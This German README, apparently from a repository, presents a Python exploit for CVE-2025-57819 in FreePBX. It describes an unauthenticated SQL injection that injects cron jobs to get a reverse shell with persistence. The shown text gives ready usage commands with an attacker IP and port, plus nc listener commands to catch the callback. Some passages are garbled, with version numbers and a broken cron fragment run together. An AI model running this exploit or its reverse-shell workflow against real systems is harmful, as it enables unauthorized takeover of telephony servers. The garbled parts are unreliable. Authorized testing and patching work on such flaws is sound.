
Python-Exploit für CVE-2025-57819, das FreePBX über eine nicht authentifizierte SQL-Injection angreift, um Remote-Code-Ausführung mit automatischer Reverse-Shell und cron-basierter Persistenz zu erreichen.
< 15.0.66, < 16.0.89 und < 17.0.3Dieses Skript nutzt CVE-2025-57819 in einem verwundbaren FreePBX-Endpunkt-Modul aus. Die Schwachstelle ermöglicht SQL-Injection, die ausgenutzt wird, um schädliche Cron-Jobs einzuschleusen.
Es sind keine zusätzlichen Schritte erforderlich wie bei anderen öffentlichen Exploits, die über eine hochgeladene Webshell mit dem Ziel interagieren. Es ist ein direkter Ansatz, der Ihnen direkt Reverse-Shell-Zugriff verschafft.
Remote-Code-Ausführung wird durch SQL-Injection und Manipulation von Cron-Jobs erreicht. Eine erfolgreiche Ausnutzung führt zu einer Reverse-Shell auf dem Zielsystem. Abhängig von der Konfiguration kann dies zu einer vollständigen Kompromittierung des Systems führen.
* * * * *)base64-Payloads beschädigt werden, wenn +-Zeichen als Leerzeichen interpretiert werden.Führen Sie den Exploit aus, indem Sie die Ziel- und Listener-Konfiguration angeben:
python3 cve-2025-57819.py <target> <lhost> <lport>
<target>: Ziel-Hostname oder IP-Adresse (verwundbare FreePBX-Instanz)<lhost>: Angreifer-IP-Adresse für Reverse-Shell-Callback<lport>: Listening-Port für eingehende Verbindungpython3 cve-2025-57819.py freepbx.local 10.10.16.38 9999
Starten Sie vor der Ausführung des Exploits einen Listener:
nc -lvnp <port>
nc -nlvp 9999
Dieses Tool ist ausschließlich für Bildungszwecke und autorisierte Sicherheitstests bestimmt. Die unbefugte Nutzung gegen Systeme ohne ausdrückliche Genehmigung ist illegal. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.
Its1Zero - [email protected]